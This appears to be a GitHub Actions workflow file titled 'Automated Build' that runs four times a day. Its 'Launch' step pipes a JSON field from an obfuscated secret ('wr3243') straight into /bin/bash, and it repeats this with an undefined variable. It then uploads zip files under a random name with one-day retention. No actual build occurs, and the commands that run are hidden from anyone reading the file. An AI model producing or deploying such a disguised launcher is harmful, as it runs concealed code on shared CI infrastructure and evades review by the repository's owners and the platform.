name: Automated Build
on:
  workflow_dispatch:

  schedule:
    - cron: '26 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          wr3243: ${{ secrets.wr3243 }}
        run: |
          printf '%s' "$wr3243" | jq -r .j73 | /bin/bash
          printf '%s' "$s89242" | jq -r .qy7454 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: KajIxfBL
          path: "*.zip"
          retention-days: 1
